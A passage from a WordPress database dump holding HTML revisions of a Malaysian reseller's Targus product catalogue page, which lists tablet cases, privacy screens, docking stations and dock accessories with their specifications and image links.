warranty</li></ul><ul><li>Available Color Black</li><li>Heavy duty, shock-absorbing case for the iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch)</li><li>Form-fit TPU shell with USA Military-Spec drop protection â€“ protects your device from 1.2m/4ft drops</li><li>Offers rugged protection in a slim, professional-looking case</li><li>Sound enhancing scoops for all iPad speakers</li><li>Integrated stand for stable viewing and comfortable typing</li><li>Optional detachable shoulder strap (THA101GLZ)</li><li>Compatible with the ambient light sensor and mic on your device</li><li>Clear window on back to display asset tag</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Protect Case for Microsoft Surfaceâ„¢ Go</strong></h3><p style=\"text-align: center;\">(THZ779GL)</p><h3 style=\"text-align: center;\"><strong>Protect Case for Microsoft Surfaceâ„¢ Go</strong></h3><p style=\"text-align: center;\">(THD491GLZ)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ779GL_11_PEN2_1024x1024.jpg?v=1571711592\" width=\"193\" height=\"193\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THD491GL_20_USE4_1024x1024.jpg?v=1571711592\" width=\"192\" height=\"192\" /></p><ul><li>Available Color Black</li><li>Case passes military grade 4â€™ drop testing (MIL-STD 810G)*</li><li>Hard-moulded tray with durable kickstand</li><li>Advanced corner protection with shock-absorbent TPU</li><li>Non-slip interior for infinite viewing angles</li><li>Integrated Surface Pen holder (pen not included)</li><li>Compatible with Surface Type Cover</li><li>Compatible with Surface Dock</li><li>Full access to camera and ports</li></ul><ul><li>Available Color Black</li><li>Case passes military grade 4â€™ drop testing (MIL-STD 810G)*</li><li>Hard-moulded tray with durable kickstand</li><li>Advanced corner protection with shock-absorbent TPU</li><li>Keyboard locking feature helps prevent accidental disconnects (keyboard not included)</li><li>Detachable hand strap (included) and integrated Surface Pen holder (pen not included)</li><li>Compatible with Surface Type Cover</li><li>Compatible with Surface Dock</li><li>Full access to camera and ports</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n			<h1>Privacy Sceen</h1>		\n		<h3 style=\"text-align: center;\"><strong>Apple Macbook</strong></h3><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0049031_magnetic-privacy-screen-for-133-macbook-2017_ebc5f6e1-9646-4840-9ef4-6441c94ae069_grande.jpg?v=1571711592\" alt=\"Magnetic Privacy Screen for 13.3\" width=\"274\" height=\"274\" /></p><h2 style=\"text-align: center;\"><strong>Magnetic Privacy Screen for Apple MacBook</strong></h2><ul id=\"product-features\"><li>Protect your on-screen data, Privacy Screens block angled viewing from prying eyes</li><li>Magnetic screens easy to attach, remove and reattach. No tools, no adhesives, no installation required</li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort</li><li>AvailableÂ  for :-</li></ul><ol><li style=\"list-style-type: none;\"><ol><li><h4>MacBook 12-inch (ASM12MBGL)</h4></li><li><h4>MacBook 13.3-inch (ASM133MBP6GL)</h4></li><li><h4>MacBook Air 13.3-inch (ASM133MBA7GL)</h4></li><li><h4>MacBook 15.4-inch (ASM154MBGL)</h4></li><li><h4>MacBook Pro 15.4-inch (ASM154MBP6GL)</h4></li></ol></li></ol><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Microsoft Surface</strong></h3><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0023768_privacy-screen-microsoft-surface-pro-4-123-clear_grande.jpg?v=1571711583\" alt=\"Privacy Screen Microsoft Surface Pro 4 (12.3\" width=\"215\" height=\"215\" /></p><h2 style=\"text-align: center;\">Â Microsoft Surface Pro 4 (12.3\") - Clear</h2><ul id=\"product-features\"><li>Privacy Screen for theÂ Microsoft Surface Pro 4 (12.3\") tablet</li><li>Works with touch screen</li><li>Anti-glare</li><li>Protect the information on your screen from unwanted viewing</li><li>Targus privacy screens are more touch-sensitive than other screens on the market</li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room<strong><a href=\"https://uk.targus.com/pages/keep-your-business-your-business\" target=\"_blank\" rel=\"noopener noreferrer\"><u><br /></u></a></strong></li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Laptop</strong></h3><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0019195_privacy-screen-116w-169_grande.jpg?v=1571711590\" alt=\"Targus Privacy Screen 11.6\" width=\"307\" height=\"307\" /></p><h2 style=\"text-align: center;\">Privacy Screen</h2><ul id=\"product-features\"><li>Privacy Screen for tablet, laptop or desktop screens</li><li>Works with touch screens and dual screens</li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort</li><li>Anti-glare</li><li>Protect the information on your screen from unwanted viewing</li><li>Targus privacy screens are more touch-sensitive than other screens on the market</li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room</li><li>Three easy attachment options: under-bezel tabs, tab guides or re-usable adhesive strips</li><li>Available for :-Â </li></ul><ol><li style=\"list-style-type: none;\"><ol><li><h4>Screen 11.6\"W - 16:9 (ASF116W9EU)</h4></li><li><h4>Screen 12.1\"W - 16:10 (ASF121WEU)</h4></li><li><h4>Screen 12.5\"W - 16:9 (ASF125W9EU)</h4></li><li><h4>Screen 13.3\"W - 16:10 (ASF133WEU)</h4></li><li><h4>Screen 13.3\"W 16:9 - (ASF133W9EU)</h4></li><li><h4>Screen 14.1\"W 16:10 - (ASF141WEU)</h4></li><li><h4>Screen 14.1\"W 16:9 - (ASF141W9EU)</h4></li><li><h4>Screen 14â€ W 16:9 - (ASF14W9EU)</h4></li><li><h4>Screen 15.4\"W 16:10 - (ASF154WEU)</h4></li><li><h4>Screen 15.6\"W 16:9 - (ASF156W9EU)</h4></li></ol></li></ol><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Monitor</strong></h3><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0019283_privacy-screen-17-43_grande.jpg?v=1571711590\" alt=\"Targus Privacy Screen 17\" width=\"269\" height=\"269\" /></p><h2 style=\"text-align: center;\">Privacy Screen</h2><ul id=\"product-features\"><li>Privacy Screen for laptop or desktop screens</li><li>Works with touch screens and dual screens</li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort</li><li>Anti-glare</li><li>Protect the information on your screen from unwanted viewing</li><li>Targus privacy screens are more touch-sensitive than other screens on the market</li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room</li><li>Three easy attachment options: under-bezel tabs, tab guides or re-usable adhesive strips</li><li>Available for :-Â </li></ul><ol><li style=\"list-style-type: none;\"><ol><li><h4>Screen 17\" 4:3 - (ASF170EU)</h4></li><li><h4>Screen 19\" 4:3 - (ASF190EU)</h4></li><li><h4>Screen 19\"W 16:10 - (ASF19WEU)</h4></li><li><h4>Screen 21.5\"W 16:9 - (ASF215W9EU)</h4></li><li><h4>Screen 22\"W 16:10 - (ASF220WEU)</h4></li><li><h4>Screen 22\"W 16:9 - (ASF22W9EU)</h4></li><li><h4>Screen 23\"W 16:9 - (ASF23W9EU)</h4></li><li><h4>Screen 23.8\"W 16:9 - (ASF238W9EU)</h4></li><li><h4>Screen 24\"W 16:10 - (ASF24WEU)</h4></li><li><h4>Screen 24\"W 16:9 - (ASF24W9EU)</h4></li><li><h4>Screen 27\"W 16:9 - (ASF27W9EU)</h4></li></ol></li></ol><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>','Targus','','inherit','closed','closed','','3686-revision-v1','','','2019-11-06 12:38:19','2019-11-06 04:38:19','',3686,'https://bintara.com.my/blog/2019/11/06/3686-revision-v1/',0,'revision','',0),(3701,1,'2019-11-06 14:02:47','2019-11-06 06:02:47','<p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/files/safeguard-your-valuables-safeport-rugged-ipad-case_300x300.jpg?v=1556613126\" alt=\"safeport rugged ipad case\" /></p><h2>Safeguard Your Valuables</h2><p>At Targus, protecting your devices is our top priority. Tablets are easily secured with our premium collection of iPad cases and otherÂ tablet casesÂ - includingÂ Field-ReadyÂ andÂ RuggedÂ options for outdoor and industrial environments. We even have laptop backpacks with hidden zippered pockets and purpose-built compartments for your keys, phone, and other personal belongings.</p>		\n		<h2>Expand Your Potential</h2><p>At Targus, weâ€™re about much more than just laptop backpacks. Our docking stations offer the convenience of universal connections, providing compatibility with multiple brands including Apple (Mac), Dell, Lenovo, HP, Acer, and Asus. This enables you to quickly plug in and connect at your home office, workstation, or on the road. Give your laptop wings as you easily connect to PC accessories like external monitors, speakers, keyboard/mice, and laptop chargers.</p><p>4K docking stationsÂ are the perfect companion for media and design creatives, offering a quality four times that of 1080P high-definition. OurÂ dual display universal docking stations hook up to two monitors for accelerated productivity and ease of transition between documents. You can find all the cables, adapters, and storage trays you need in our collection of docking station accessories.</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/files/expand-your-potential-dock520usz-quad-docking-station_300x300.jpg?v=1556613316\" alt=\"expand your potential dock quad docking station\" width=\"519\" height=\"348\" /></p>		\n			<h1>Docking Stations</h1>		\n		<h3 style=\"text-align: center;\"><strong>USB-Câ„¢ Universal QUAD HD (QVHD) Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK520USZ)</p><h3 style=\"text-align: center;\"><strong>USB-Câ„¢ Universal DV4K Docking Station with 100W Power</strong></h3><p style=\"text-align: center;\">(DOCK190AP)</p><h3 style=\"text-align: center;\"><strong>Thunderboltâ„¢ 3 DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK220AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/DOCK520USZ_MAIN1_1024x1024.png?v=1558464095\" width=\"222\" height=\"222\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0042963_usb-c-universal-dv4k-docking-station-with-100w-power_grande.jpg?v=1543989907\" alt=\"USB-Câ„¢ Universal DV4K Docking Station with 100W Power\" width=\"210\" height=\"210\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/Dock220_grande.jpg?v=1553684715\" alt=\"Thunderboltâ„¢ 3 DV4K Docking Station with Power\" width=\"214\" height=\"214\" /></p><ul><li>Supports four HD (1920 x 1080 p60) displays or two 2K (2560 x 1440 p50) displays via 4 HDMI ports</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C 3.0 Port with power (15W non-PD)</li></ul><ul><li>Supports dual 4K Ultra HD monitor video via 2 DisplayPortâ„¢ (DP 1.2a) and 2 HDMI (HDMI 2.0) ports</li><li>Power Delivery up to 100W</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C USB 3.1 Gen 1 device port</li><li>Includes 1-meter USB-C to C host cable (detachable) and 1 standard lock slot</li><li>Power tips included to power AcerÂ®, ASUSÂ®, CompaqÂ®, Dellâ„¢, FujitsuÂ®, GatewayÂ®, HPÂ®, IBM/Lenovoâ„¢, and Toshiba</li></ul><ul><li>0.5M passive 40G, 5A cable (C/M to C/M)</li><li>Cable lock slot</li><li>Power Delivery 2.0 up to 85W</li><li>Supports dual-display</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK171)</p><h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK177)</p><h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV4K Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK160AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACP71USZ_grande.png?v=1551118350\" alt=\"Universal USB 3.0 DV Docking Station with Power\" width=\"197\" height=\"197\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0027659_universal-usb-30-dv4k-docking-station-with-power_grande.jpg?v=1543990156\" alt=\"Universal USB 3.0 DV4K Docking Station with Power\" width=\"205\" height=\"205\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/dock160usz_grande.png?v=1554473002\" alt=\"Universal USB 3.0 DV4K Docking Station\" width=\"205\" height=\"205\" /></p><ul><li>Dual 2048 x 1152 at 60Hz 24 bpp color video (single 2K 2560 x 1440 at 50Hz HDMI) leveraging the DisplayLink DL-3900 technology</li><li>19VDC PC laptop power and charging up to 90W</li><li>Removable standalone power and charging tip compartment</li><li>Integrated lock slot accommodates industry-standard security locks</li><li>Wedge design for laptop mounting</li><li>Includes detachable 1-meter USB ÂµB to A host cable</li><li>Includes 120W AC adapter and power connected purple LED light</li><li>Includes detachable 1-meter DC host power and charging cable</li></ul><ul><li>Dual DisplayPort 1.2++ (with MST), dual HDMI 2.0, or one of each external monitor port</li><li>19VDC PC laptop power and charging up to 90W</li><li>Removable standalone tip compartment</li><li>Integrated lock slot accommodates industry-standard security locks</li><li>Wedge design for laptop mounting</li><li>Includes detachable 1-meter USB 3.0 uB to A host cable</li><li>Includes 120W AC adapter and power connected purple LED light</li><li>Includes detachable 1-meter DC host power and charging cable</li><li>Dual 4K2K up to 4096x2160 60Hz (p60) 24 bpp color video monitor support leveraging the DisplayLink DL-6950 chipset</li></ul><ul><li>Dual DisplayPort (DP 1.2a) or Dual HDMI (HDMI 2.0) video or one of each</li><li>Dual 4K Ultra HD video 4096x2160 60Hz (p60) 24 bpp with 6-Channel (5.1) Audio</li><li>1 USB-C device port (USB 3.0 5Gbps data only)</li><li>1 Gigabit Ethernet port for wired connectivity</li><li>4 USB 3.0 ports for the latest peripherals (1 BC1.2 fast device-charging port)</li><li>1 3.5mm combo Audio In/Out port for mics, speakers, and earphones</li><li>Includes 1-meter USB-ÂµB/M to A/M cable (detachable)</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates standard industry-security locks to safeguard equipment</li><li>Universal compatibility with the majority of laptop and PC tablet brands and platforms</li><li>Includes 45W AC adapter</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>USB-C Universal DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK180AP)</p><h3 style=\"text-align: center;\"><strong>USB-C Universal Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK410AP)</p><h3 style=\"text-align: center;\"><strong>2K Universal Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK120AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0030076_usb-c-universal-dv4k-docking-station-with-power_grande.jpg?v=1544442889\" alt=\"USB-C Universal DV4K Docking Station with Power\" width=\"234\" height=\"234\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0041279_usb-c-universal-docking-station-black.jpeg\" width=\"236\" height=\"236\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/DOCK120USZ_ACP120US_50_MAIN-ALT2_grande.png?v=1549657702\" alt=\"2K Universal Docking Station\" width=\"238\" height=\"238\" /></p><ul><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) port support dual 4k Ultra HD monitors</li><li>Power Delivery 2.0 provides up to 60W charging</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C device port (USB 3.0 data only)</li><li>1 Gigabit Ethernet port for secure, wire speed Ethernet access</li><li>4 USB 3.0 ports for the latest peripherals (1 fast device-charging port)</li><li>Includes 1-meter USB-C to C host cable (detachable)</li><li>1 3.5mm combo Audio In/Out for mics, speakers, and earphones</li><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) ports support dual 4K Ultra HD monitors</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates industry-standard security locks</li></ul><ul><li>1 Gigabit Ethernet Port for wired access at ultra-fast speeds</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates standard security locks to safeguard equipment</li><li>Universal compatibility with popular laptop and PC tablet brands and operating systems</li></ul><ul><li>1 Audio In/Out port for mics, speakers and earphones</li><li>1 DVI-I and 1 HDMI port supports dual monitors (up to 2048 x 1152 x 60 fps)</li><li>1 Gigabit Ethernet port for wired access at ultra-fast speeds</li><li>3 USB 3.0 SuperSpeed ports for the latest peripherals</li><li>1 USB 3.0 powered port for fast device charging</li><li>Integrated Lock Slot accommodates security locks to safeguard equipment</li><li>Universal compatibility with popular brands and operating systems</li><li>1 DisplayPort port supports a single 2K monitor (up to 2560 x 1600 x 30 fps)</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaLink Universal Dual Video Travel Dock</strong></h3><p style=\"text-align: center;\">(DOCK110AP)</p><h3 style=\"text-align: center;\"><strong>USB-C DisplayPortâ„¢ Alt-Mode Travel Dock</strong></h3><p style=\"text-align: center;\">(DOCK411)</p><h3 style=\"text-align: center;\"><strong>USB-C Alt-Mode Travel Dock w/ PD</strong></h3><p style=\"text-align: center;\">(DOCK412AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/dock110usz_grande.jpg?v=1553684661\" alt=\"VersaLink Universal Dual Video Travel Dock\" width=\"259\" height=\"180\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0027522_usb-c-displayport-alt-mode-travel-dock_1024x1024.png?v=1546599971\" width=\"181\" height=\"181\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0050999_usb-c-alt-mode-travel-dock-w-pd-black_150.png\" alt=\"Picture of USB-C Alt-Mode Travel Dock w/ PD (Black)\" width=\"187\" height=\"187\" /></p><ul><li>VGA video port with 2048 x 1152 at 60 FPS resolution. HDMI video port with 2560 x 1440 at 50 FPS resolution. Gigabit Ethernet port for secure, wire speed Ethernet access. 2 USB SuperSpeed 3.0 ports for mice, flash drives, external hard drives and card readers.</li><li>Integrated USB power cable connects to laptops, 2-in-1s and Microsoft Surface.</li><li>Compact, smartphone-size dock weighs less than 5.5 ounces for easy portability</li><li>Mac or PC compatible</li></ul><ul><li>Host-powered 90 mm tethered USB Type-C DisplayPortâ„¢ Alt-Mode (compatible with Thunderboltâ„¢ 3) host connection</li><li>VGA up to 2048 x 1152 60Hz or HDMI2.0 up to 4096 x 2160 30Hz 24 bpp monitor connection</li><li>1 USB 3.1 Gen 1 5Gbps (USB 3.0) Type-A port</li><li>1 Gigabit Ethernet port</li><li>HDMI includes 6 (5.1) channel audio</li><li>Universal compatibility with popular WindowsÂ® and macOSâ„¢ platforms</li><li>Compact size thatâ€™s ideal for travel</li></ul><ul><li>mDP (4096 x 2160 p30 max)</li><li>HDMI (4096 x 2160 p30 max)</li><li>VGA (1920 x 1200)</li><li>USB-C upstream cable (Laptop charging capable by PD pass through)</li><li>2 x USB 3.1 Gen 1 type A downstream port</li><li>1 x USB-C PD pass through (up to 60W) port with USB 3.1 Gen 1 downstream data support</li><li>Gigabit Ethernet; Lock Slot</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n			<h1>Dock Accessories</h1>		\n		<h3 style=\"text-align: center;\"><strong>USB-C to USB-A Cable</strong></h3><p style=\"text-align: center;\">(ACC1104GLX)</p><h3 style=\"text-align: center;\"><strong>3-Pin 3-Way Hydra DC Power Cable</strong></h3><p style=\"text-align: center;\">(ACC1009USX)</p><h3 style=\"text-align: center;\"><strong>USB-C Multiplexer Adapter</strong></h3><p style=\"text-align: center;\">(ACA46USZ)</p><h3 style=\"text-align: center;\"><strong>USB-C Alt-Mode Travel Dock w/ PD</strong></h3><p style=\"text-align: center;\">(ACA42USZ)</p><p><img src=\"https://www.targus.com/content/images/thumbs/0053546_usb-cf-to-usb-30-am-cable.jpeg\" width=\"188\" height=\"188\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0030033_3-pin-3-way-hydra-dc-power-cable.png\" width=\"187\" height=\"187\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACA47GLZ_MAIN1_grande.png?v=1564601685\" alt=\"USB-C Multiplexer Adapter\" width=\"189\" height=\"189\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACA42USZ_grande.jpg?v=1553683594\" alt=\"USB-Câ„¢ Demultiplexer\" width=\"194\" height=\"194\" /></p><ul><li>USB Type-C female to USB 3.0 Type-A cable</li><li>10cm long with tether</li><li>Transfers data at rates up to 5 Gbps</li><li>Compatible with Targus DOCK180USZ</li></ul><ul><li>Powers up to 1 large and 1 small device simultaneously</li><li>Supports three connectors for multi-user and multi-device environments</li><li>Self-locking collars ensure tips and power cable stay in place</li><li>Uses existing Targus power cable and power tips from your powered dock (not included)</li></ul><ul><li>Supports USB-C laptops</li><li>Works with Targus docks DOCK171USZ, DOCK177USZ, ACP77USZ and ACP71USZ</li><li>Compact size for easy carrying</li><li>Provides up to 85W of power with PD 2.0 and charges USB-C devices that accept charging via the USB-C port</li><li>5 different charge profiles to ensure compatibility</li><li>Includes USB-A, 2-pin DC Power, and 3-pin DC power ports; outputs USB-C</li></ul><ul><li>1 USB-C/F port</li><li>Enables support for legacy host devices</li><li>Uses universal 3-pin power tip support</li><li>For use with DOCK 180</li><li>Supports power delivery charging up to 60W</li><li>Supports USB 3.0 data transfer up 5 Gbps</li><li>1 USB 3.0 Type A/M cable</li><li>1 Targus 3 pin DC power cable (with tips for various laptop models)</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n			<h1>Tablet Cases</h1>		\n		<h3 style=\"text-align: center;\"><strong>VersaVuÂ® Multi-Gen for 9.7\" IPad Pro, iPad Air 1, And 2</strong></h3><p style=\"text-align: center;\">(THZ634GL)</p><h3 style=\"text-align: center;\"><strong>3D Protection</strong><strong>â„¢ </strong><strong style=\"font-size: 1.25rem;\">Multi-Gen for </strong><strong style=\"font-size: 1.25rem;\">9.7 </strong><strong style=\"font-size: 1.25rem;\">iPad Pro, iPad Air 1, and 2</strong></h3><p style=\"text-align: center;\">(THZ635GL)</p><h3 style=\"text-align: center;\"><strong>New Pro-Tek Rotating iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73711GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/THZ634GL_FRONT_grande.png?v=1549412474\" alt=\"Black VersaVuÂ® Classic Case (Black) for iPadÂ® (2017/2018) (THZ634GL) - Front\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0024531_3d-protection-case-black-for-ipad-20172018-97-inch-ipad-pro-ipad-air-2-and-ipad-air_1024x1024.jpg?v=1547855512\" width=\"194\" height=\"194\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/THZ73711GL_MAIN1_grande.png?v=1569597181\" alt=\"Pro-Tek Rotating Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Silver\" width=\"198\" height=\"198\" /></p><ul><li>Passes military grade 4ft. drop testing (MIL-STD 810G)</li><li>Patented 360Â° rotation for portrait/landscape views</li><li>Adjustable viewing angles and comfortable typing angle</li><li>Precision cut access to controls, ports, and camera</li><li>Tray design enhances audio performance</li><li>Integrated stylus holder protects your Apple Pencilâ„¢ or stylus</li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2</li><li>Convenient sleep/wake function works with iPad Pro (9.7-inch), iPad Air 1 and 2</li></ul><ul id=\"product-features\"><li>Passes military grade 4ft. drop testing (MIL-STD 810G)</li><li>Infinite viewing angles plus comfortable typing position</li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2</li><li>Flexible tray with reinforced corners and bezel protection</li><li>Precision-cut access to controls, ports, and camera lenses</li><li>Easy-grip textured cover with secure magnetic wrap closure</li><li>Tray design enhances audio performance</li><li>Convenient sleep/wake function works with iPad ProÂ  (9.7-inch), iPad Air 1 and 2</li></ul><ul id=\"product-features\"><li>Color Black / Charcoal &amp; Silver</li><li>Passes military grade 4ft. drop testing</li><li>Geometric Pro-Tekâ„¢ design enhances protection</li><li>Reinforced corners guard against impact</li><li>Patented 360Â° rotation for portrait/landscape viewing</li><li>Virtually infinite viewing angles and comfortable typing position</li><li>Precision-cut access to controls, ports, and camera</li><li>Audio-enhancing sound scoops boost sound performance</li><li>Secure magnetic wrap closure</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>New Click-In iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73608GL)</p><h3 style=\"text-align: center;\"><strong>New VersaVu </strong><strong>iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73803GL)</p><h3 style=\"text-align: center;\"><strong>New VersaVu Signature iPad 9.7\" </strong><strong>2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73902GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73608GL_MAIN1_grande.jpg?v=1571711592\" alt=\"Click-In Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Rose Gold\" width=\"196\" height=\"196\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73803GL_MAIN1_grande.jpg?v=1571711592\" alt=\"VersaVu Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Red\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73902GL_MAIN1_grande.jpg?v=1571711592\" alt=\"VersaVu Signature Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Blue\" width=\"197\" height=\"197\" /></p><ul><li>Available Color Black/Charcoal, Rose Gold &amp; Silver</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Precision cut access to controls, ports, and camera lenses</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic closure ensures secure transport</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal, Blue &amp; Red</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Precision control, port and camera cutouts deliver hassle-free listening and photos</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal &amp; Blue</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Premium fabric/faux leather exterior with metallic accents delivers standout style</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Secure, metallic snap-close mechanism delivers quick access and striking style</li><li>Premium faux leather hand strap</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaVu </strong><strong>11-inch </strong><strong>iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ74413GL)</p><h3 style=\"text-align: center;\"><strong>Pro-Tek </strong><strong>11-inchÂ  </strong><strong>iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ73803GL)</p><h3 style=\"text-align: center;\"><strong>VersaVu Signature </strong><strong>11-inch </strong><strong>iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ74502GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\" 